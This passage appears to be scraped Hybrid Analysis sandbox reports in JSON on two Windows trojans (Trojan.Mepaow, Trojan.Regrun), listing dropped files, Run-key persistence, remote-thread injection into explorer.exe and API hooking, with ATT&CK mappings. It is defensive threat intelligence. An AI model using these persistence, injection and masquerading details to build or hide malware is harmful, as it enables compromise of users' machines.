\"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" called \"FindNextFileW\" with parameter Branding (UID: 00000000-00006128)\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" called \"FindNextFileW\" with parameter CSC (UID: 00000000-00006128)\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" called \"FindNextFileW\" with parameter Cursors (UID: 00000000-00006128)\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" called \"FindNextFileW\" with parameter debug (UID: 00000000-00006128)\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" called \"FindNextFileW\" with parameter diagnostics (UID: 00000000-00006128)\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" called \"FindNextFileW\" with parameter DigitalLocker (UID: 00000000-00006128)\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" called \"FindNextFileW\" with parameter Downloaded Program Files (UID: 00000000-00006128)\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" called \"FindNextFileW\" with parameter ehome (UID: 00000000-00006128)\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" called \"FindNextFileW\" with parameter en-US (UID: 00000000-00006128)\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" called \"FindNextFileW\" with parameter explorer.exe (UID: 00000000-00006128)\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" called \"FindNextFileW\" with parameter Fonts (UID: 00000000-00006128)\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" called \"FindNextFileW\" with parameter fveupdate.exe (UID: 00000000-00006128)\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" called \"FindNextFileW\" with parameter Globalization (UID: 00000000-00006128)\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" called \"FindNextFileW\" with parameter Help (UID: 00000000-00006128)\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" called \"FindNextFileW\" with parameter HelpPane.exe (UID: 00000000-00006128)\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" called \"FindNextFileW\" with parameter hh.exe (UID: 00000000-00006128)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"WINSOCK_REGISTRY_VERSION\"; Value: \"\")\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"NAMESPACE_CALLOUT\"; Value: \"\")\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"SERIAL_ACCESS_NUM\"; Value: \"\")\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NEXT_CATALOG_ENTRY_ID\"; Value: \"\")\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NUM_CATALOG_ENTRIES\"; Value: \"\")\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000001\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000002\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000003\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000004\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000005\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000006\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000007\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000008\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000009\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "static-188", "relevance": 5, "name": "Calls APIs used for Remove Service", "description": "Observed import api \"DeleteService\" which can \"Deregister service in Service Control Manager database\" [Source: 208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360]\n Observed import api \"DeleteService\" which can \"Deregister service in Service Control Manager database\" [Source: ntbootdd.exe.bin]", "origin": "Static Parser", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-67", "type": 3, "relevance": 10, "name": "Creates or modifies windows services", "description": "\"ntbootdd.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\")", "origin": "Registry Access", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-4", "relevance": 10, "name": "Entrypoint in PE header is within an uncommon section", "description": "\"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360\" has an entrypoint in section \"UPX0\"\n \"ntbootdd.exe.bin\" has an entrypoint in section \"UPX0\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"ntbootdd.exe.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"ntbootdd.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%WINDIR%\\ntbootdd.exe]- [targetUID: 00000000-00005888]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "registry-0", "type": 3, "relevance": 8, "name": "Modifies auto-execute functionality by setting/creating a value in the registry", "description": "\"ntbootdd.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\")\n \"ntbootdd.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"NTBOOTDD\"; Value: \"%WINDIR%\\ntbootdd.exe\")", "origin": "Registry Access", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360\" has section name UPX0 with entropy \"6.57341164116\"\n \"ntbootdd.exe.bin\" has section name UPX0 with entropy \"6.57341164116\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-26", "type": 6, "relevance": 10, "name": "Marks file for deletion", "description": "\"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" marked \"C:\\tmp.htm\" for deletion\n \"ntbootdd.exe\" marked \"C:\\tmp.htm\" for deletion", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" opened \"C:\\tmp.htm\" with delete access\n \"ntbootdd.exe\" opened \"C:\\tmp.htm\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "General", "identifier": "binary-11", "type": 8, "relevance": 10, "name": "The analysis extracted a file that was identified as malicious", "description": "16/22 Antivirus vendors marked dropped file \"ntbootdd.exe.bin\" as malicious (classified as \"Trojan.Mepaow\" with 72% detection rate)\n 16/22 Antivirus vendors marked dropped file \"ntbootdd.exe\" as malicious (classified as \"Trojan.Mepaow\" with 72% detection rate)", "origin": "Binary File", "attck_id": "T1204.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1204/002"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "General", "identifier": "target-58", "type": 9, "relevance": 10, "name": "The analysis spawned a process that was identified as malicious", "description": "16/22 Antivirus vendors marked spawned process \"ntbootdd.exe\" (PID: 5888) as malicious (classified as \"Trojan.Mepaow\" with 72% detection rate)\n 16/22 Antivirus vendors marked spawned process \"ntbootdd.exe\" (PID: 3108) as malicious (classified as \"Trojan.Mepaow\" with 72% detection rate)\n 16/22 Antivirus vendors marked spawned process \"ntbootdd.exe\" (PID: 3788) as malicious (classified as \"Trojan.Mepaow\" with 72% detection rate)\n 16/22 Antivirus vendors marked spawned process \"ntbootdd.exe\" (PID: 4420) as malicious (classified as \"Trojan.Mepaow\" with 72% detection rate)", "origin": "Monitored Target", "attck_id": "T1204.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1204/002"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "target-14", "type": 9, "relevance": 8, "name": "Spawns a lot of processes", "description": "Spawned process \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" (UID: 00000000-00006128)\n Spawned process \"ntbootdd.exe\" with commandline \"-bs\" (UID: 00000000-00005888)\n Spawned process \"ntbootdd.exe\" (UID: 00000000-00003108)\n Spawned process \"ntbootdd.exe\" (UID: 00000000-00003788)\n Spawned process \"ntbootdd.exe\" (UID: 00000000-00004420)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-20", "type": 6, "relevance": 7, "name": "Allocates virtual memory in a remote process", "description": "\"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" allocated memory in \"C:\\208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\"", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\ntbootdd.exe\" (Handle: 280)\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\ntbootdd.exe\" (Handle: 280)\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\ntbootdd.exe\" (Handle: 280)\n \"ntbootdd.exe\" wrote 24 bytes to a remote process \"C:\\Windows\\explorer.exe\" (Handle: 280)\n \"ntbootdd.exe\" wrote 11 bytes to a remote process \"C:\\Windows\\explorer.exe\" (Handle: 280)\n \"ntbootdd.exe\" wrote 17 bytes to a remote process \"C:\\Windows\\explorer.exe\" (Handle: 280)\n \"ntbootdd.exe\" wrote 15 bytes to a remote process \"C:\\Windows\\explorer.exe\" (Handle: 280)\n \"ntbootdd.exe\" wrote 44 bytes to a remote process \"C:\\Windows\\explorer.exe\" (Handle: 280)\n \"ntbootdd.exe\" wrote 616 bytes to a remote process \"C:\\Windows\\explorer.exe\" (Handle: 280)\n \"ntbootdd.exe\" wrote 24 bytes to a remote process \"C:\\Windows\\explorer.exe\" (Handle: 284)\n \"ntbootdd.exe\" wrote 11 bytes to a remote process \"C:\\Windows\\explorer.exe\" (Handle: 284)\n \"ntbootdd.exe\" wrote 17 bytes to a remote process \"C:\\Windows\\explorer.exe\" (Handle: 284)\n \"ntbootdd.exe\" wrote 15 bytes to a remote process \"C:\\Windows\\explorer.exe\" (Handle: 284)\n \"ntbootdd.exe\" wrote 44 bytes to a remote process \"C:\\Windows\\explorer.exe\" (Handle: 284)\n \"ntbootdd.exe\" wrote 616 bytes to a remote process \"C:\\Windows\\explorer.exe\" (Handle: 284)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "hooks-2", "type": 11, "relevance": 10, "name": "Hooks file system APIs", "description": "\"FindFirstFileW@KERNEL32.DLL\" in \"ntbootdd.exe\"\n \"FindNextFileA@KERNEL32.DLL\" in \"ntbootdd.exe\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"ntbootdd.exe\"\n \"FindNextFileW@KERNEL32.DLL\" in \"ntbootdd.exe\"", "origin": "Hook Detection", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "api-106", "type": 6, "relevance": 10, "name": "Calls an API typically used to create a thread in another process", "description": "\"ntbootdd.exe\" called \"CreateRemoteThread\" with parameters {\"hProcess\": \"280\"\n \"lpThreadAttributes\": \"0\"\n \"dwStackSize\": \"0\"\n \"lpStartAddress\": \"50266112\"\n \"lpParameter\": \"49807360\"\n \"dwCreationFlags\": \"0\"\n \"lpThreadId\": \"1244668\"}", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Spyware/Information Retrieval", "identifier": "hooks-5", "type": 11, "relevance": 10, "name": "Hooks internet related APIs", "description": "\"send@WS2_32.DLL\" in \"ntbootdd.exe\"", "origin": "Hook Detection", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47
https://hybrid-analysis.com/sample/506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47
Hybrid Analysis - Killers
{"size": 163903, "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "submit_name": "506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47", "sha256": "506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47", "av_detect": 94, "vx_family": "Trojan.Regrun", "threat_score": 85, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_processes": 64, "total_signatures": 140, "extracted_files": [{"name": "services.exe", "file_size": 163903, "sha256": "506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level": 2, "threat_level_readable": "malicious", "av_label": "Trojan.Regrun", "av_matched": 17, "av_total": 22, "file_available_to_download": true}, {"name": "lsass.exe", "file_size": 163903, "sha256": "506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level": 2, "threat_level_readable": "malicious", "av_label": "Trojan.Regrun", "av_matched": 17, "av_total": 22, "file_available_to_download": true}, {"name": "IExplorer.exe", "file_size": 163903, "sha256": "506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "SMSS.EXE (PID: 3904)", "threat_level": 2, "threat_level_readable": "malicious", "av_label": "Trojan.Regrun", "av_matched": 17, "av_total": 22, "file_available_to_download": true}, {"name": "winlogon.exe", "file_size": 163903, "sha256": "506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level": 2, "threat_level_readable": "malicious", "av_label": "Trojan.Regrun", "av_matched": 17, "av_total": 22, "file_available_to_download": true}, {"name": "smss.exe", "file_size": 163903, "sha256": "506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level": 2, "threat_level_readable": "malicious", "av_label": "Trojan.Regrun", "av_matched": 17, "av_total": 22, "file_available_to_download": true}, {"name": "D3_08.exe", "file_size": 163903, "sha256": "506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "SMSS.EXE (PID: 3904)", "threat_level": 2, "threat_level_readable": "malicious", "av_label": "Trojan.Regrun", "av_matched": 17, "av_total": 22, "file_available_to_download": true}, {"name": "csrss.exe", "file_size": 163903, "sha256": "506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level": 2, "threat_level_readable": "malicious", "av_label": "Trojan.Regrun", "av_matched": 17, "av_total": 22, "file_available_to_download": true}, {"name": "LSASS.EXE", "file_size": 163903, "sha256": "506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "SMSS.EXE (PID: 3904)", "threat_level": 2, "threat_level_readable": "malicious", "av_label": "Trojan.Regrun", "av_matched": 17, "av_total": 22, "file_available_to_download": true}, {"name": "SMSS.EXE", "file_size": 163903, "sha256": "506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "SMSS.EXE (PID: 3904)", "threat_level": 2, "threat_level_readable": "malicious", "av_label": "Trojan.Regrun", "av_matched": 17, "av_total": 22, "file_available_to_download": true}, {"name": "SERVICES.EXE", "file_size": 163903, "sha256": "506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "SMSS.EXE (PID: 3904)", "threat_level": 2, "threat_level_readable": "malicious", "av_label": "Trojan.Regrun", "av_matched": 17, "av_total": 22, "file_available_to_download": true}, {"name": "WINLOGON.EXE", "file_size": 163903, "sha256": "506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "SMSS.EXE (PID: 3904)", "threat_level": 2, "threat_level_readable": "malicious", "av_label": "Trojan.Regrun", "av_matched": 17, "av_total": 22, "file_available_to_download": true}, {"name": "CSRSS.EXE", "file_size": 163903, "sha256": "506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "SMSS.EXE (PID: 3904)", "threat_level": 2, "threat_level_readable": "malicious", "av_label": "Trojan.Regrun", "av_matched": 17, "av_total": 22, "file_available_to_download": true}, {"name": "Empty.pif", "file_path": "%ALLUSERSPROFILE%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif", "file_size": 163903, "sha256": "feb13cf81db577a77f4904d880afe9e4f5df7ecfc967208b629d2985f9f31b27", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "SMSS.EXE (PID: 3904)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "CSRSS.EXE", "file_path": "%LOCALAPPDATA%\\WINDOWS\\CSRSS.EXE", "file_size": 163903, "sha256": "2e46a1bd18f9e8441b0469172709cabc06ebebd089c582988beab8f8a50d50a0", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "SMSS.EXE (PID: 3904)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "LSASS.EXE", "file_path": "%LOCALAPPDATA%\\WINDOWS\\LSASS.EXE", "file_size": 163903, "sha256": "7e235d3de9d6db94e2e867588bbda26281d1927341353ed86281006ade3b213d", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "SMSS.EXE (PID: 3904)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "SERVICES.EXE", "file_path": "%LOCALAPPDATA%\\WINDOWS\\SERVICES.EXE", "file_size": 163903, "sha256": "12ec50e45e4172c8db74d9be0def6221041485f2c26f2bbb88520f1fb37e4582", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "SMSS.EXE (PID: 3904)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "SMSS.EXE", "file_path": "%LOCALAPPDATA%\\WINDOWS\\SMSS.EXE", "file_size": 163903, "sha256": "10627de837ee21028d541a74784fb2ca8614d0f1f00580be6924ea9b9c1004ea", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "SMSS.EXE (PID: 3904)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "WINLOGON.EXE", "file_path": "%LOCALAPPDATA%\\WINDOWS\\WINLOGON.EXE", "file_size": 163903, "sha256": "38371b5e9755e41aeb39d5e7e024372b816d2912e3a3953dc39178937a4d79d1", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "SMSS.EXE (PID: 3904)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "D3_08.exe", "file_path": "%WINDIR%\\D3_08.exe", "file_size": 163903, "sha256": "82b75a242b17cfb2c72035438a3d53517cc23ef2b9a985011c5ec44da739b38d", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "SMSS.EXE (PID: 3904)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "IExplorer.exe", "file_path": "%WINDIR%\\System32\\IExplorer.exe", "file_size": 163903, "sha256": "d465297efaea5cfaf771fe6c34caf02691b8d4ee421f239d797c447fbb33dab4", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "SMSS.EXE (PID: 3904)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "MrD3_08.scr", "file_path": "%WINDIR%\\System32\\MrD3_08.scr", "file_size": 163903, "sha256": "4ff2d86e30053ee8f5f5754c9a081d5193fb4dd69ea2d9d3ae89c2b6d31275f1", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "SMSS.EXE (PID: 3904)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "shell.exe", "file_path": "%WINDIR%\\System32\\shell.exe", "file_size": 163903, "sha256": "94a4c0a993e5ceb1249458f03c79213f6954735dfce528d33ca1de9464f721db", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "SMSS.EXE (PID: 3904)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "D3_08.exe", "file_path": "C:\\D3_08.exe", "file_size": 163903, "sha256": "69faf083baed4c4b14793fd44bb257f49ebf6e33bc8a9d2ea45da2ce12ebacfd", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "SMSS.EXE (PID: 3904)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "PuRn4m4.txt", "file_path": "C:\\PuRn4m4.txt", "file_size": 441, "sha256": "c8cfecfb4260f0488e4152cdaaca8854865f0e20d15e9e37cba26f81db38c195", "type_tags": ["text"], "description": "ASCII text, with CRLF line terminators", "runtime_process": "SMSS.EXE (PID: 3904)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "D3_08.exe.bin", "file_size": 163903, "sha256": "82b75a242b17cfb2c72035438a3d53517cc23ef2b9a985011c5ec44da739b38d", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "Data HAPUBWS.exe", "file_size": 163903, "sha256": "8db8cbc01a284fe15627c20e03eee6f82e293f4ba872511c0d2cb9208fede2cc", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "New Folder.exe", "file_size": 163903, "sha256": "7ad6c748f1798676f684c5f53570758e7bfc1153c75cf667b24c836b0a0bc655", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "CSRSS.EXE.bin", "file_size": 163903, "sha256": 